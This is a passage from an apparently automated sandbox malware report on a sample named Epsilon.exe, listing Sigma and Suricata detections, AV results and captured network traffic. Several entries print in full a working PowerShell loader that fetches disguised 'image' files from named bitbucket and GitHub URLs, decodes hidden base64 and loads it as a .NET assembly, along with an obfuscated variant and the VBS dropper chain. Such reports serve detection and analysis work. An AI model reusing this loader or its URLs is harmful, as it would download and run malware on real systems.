$EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $start
        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J
        Sigma detected: Script Interpreter Execution From Suspicious Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 677174b841ee7.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7344, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , ProcessId: 7416, ProcessName: wscript.exe
        Sigma detected: Suspicious Script Execution From Temp Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 677174b841ee7.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7344, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , ProcessId: 7416, ProcessName: wscript.exe
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 677174b841ee7.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7344, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , ProcessId: 7416, ProcessName: wscript.exe
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Epsilon.exe, ProcessId: 7312, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $start
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 677174b841ee7.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7344, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" , ProcessId: 7416, ProcessName: wscript.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J

        Data Obfuscation

        barindex
        Sigma detected: Powershell download and load assembly
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $start

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-31T00:46:01.370508+010020490381A Network Trojan was detected185.199.111.133443192.168.2.549704TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: Epsilon.exeReversingLabs: Detection: 36%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF7378230EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7378230EC
        Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: Epsilon.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: wextract.pdb source: Epsilon.exe
        Source: Binary string: wextract.pdbGCTL source: Epsilon.exe
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 00000007.00000002.2169777517.000001A1DA5D0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdbG_a_ S__CorExeMainmscoree.dll source: powershell.exe, 00000007.00000002.2169777517.000001A1DA5D0000.00000004.08000000.00040000.00000000.sdmp
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF73782204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF73782204C

        Software Vulnerabilities

        barindex
        Suspicious execution chain found
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.111.133:443 -> 192.168.2.5:49704
        Source: global trafficHTTP traffic detected: GET /gmedusa135/nano/refs/heads/main/new_img123.jpg HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /rterterq/fwqfqweqwr/downloads/opkSkch.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
        Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /gmedusa135/nano/refs/heads/main/new_img123.jpg HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /rterterq/fwqfqweqwr/downloads/opkSkch.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
        Source: global trafficDNS traffic detected: DNS query: bitbucket.org
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 23:46:06 GMTContent-Type: text/html; charset=utf-8Content-Length: 15006Server: AtlassianEdgeVary: authorization, cookie, user-context, Accept-Language, Origin, Accept-EncodingX-Used-Mesh: FalseContent-Language: enX-View-Name: bitbucket.apps.downloads.views.download_fileEtag: "1c2c848b4429d52ca3adbc7af471337d"X-Dc-Location: Micros-3X-Served-By: b21088039ab2X-Version: c9b3998323c0X-Static-Version: c9b3998323c0X-Request-Count: 4163X-Render-Time: 0.07419872283935547X-B3-Traceid: 9cad47e97f70404b945b4d3a04e1fe2dX-B3-Spanid: ac1738aebb95f397X-Frame-Options: SAMEORIGINContent-Security-Policy: base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net 